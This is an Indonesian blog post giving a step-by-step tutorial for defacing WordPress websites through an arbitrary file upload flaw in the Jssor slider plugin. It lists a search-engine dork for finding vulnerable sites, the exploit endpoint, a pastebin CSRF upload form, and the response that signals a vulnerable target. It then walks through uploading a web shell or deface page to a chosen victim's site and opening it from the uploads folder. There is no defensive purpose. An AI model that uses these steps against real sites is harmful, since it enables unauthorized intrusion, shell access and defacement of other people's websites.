Tutorial Deface website 2018 - serbaguna

Breaking

Home Top Ad

Responsive Ads Here

Post Top Ad

Responsive Ads Here

Rabu, 05 Desember 2018

Tutorial Deface website 2018

Halo Selamat Siang Entah DiSitu Pagi Atau Malam Yang Penting Disini Masih Siang :V
Disini Aku Mau Bagi Tutorial Cara Deface Dengan Metode Jssor Arbitary file upload Exploit Wordpres

Bahan Yang DiPerlukan

Dork
-inurl:/wp-content/jssor-slider/ site:
Dork Kembangkan Sampe Croot

Exploit
/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

CSRF
https://pastebin.com/raw/mRH29wrY

Shell
Kalau Hoki Bisa Upload Shell

Script Deface

Setelah Bahan Udah Ada Langsung Aja KeTKP

1.Pertama Kita Dorking Terlebih Dahulu Copy Dork Paste DiMesin Pencarian
2.Kalian Pilih Salah Satu Website Buat DiJebol Dan Masukin Exploit DiBelakang URL Korban ^_^.
3.Kalau Website Vuln Muncul Code Seperti DiGambar
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
4.Kalau Udah Buka CSRF Hasil Download Tadi Masukan URL Korban
5.Kalau Udah Save Berformat.html Contoh CSRF.html
6.Kalau Udah Upload Aja File Anda Entah Itu Shell Kalau Nggak Script Deface
7.Kalau Udah Tinggal Akses Aja File Hasil Upload Tadi  Cara Akses /wp-content/jssor-slider/jssor-uploads/SiniFile.php Atau html

Tidak ada komentar:

Posting Komentar

Post Bottom Ad

Responsive Ads Here

Pages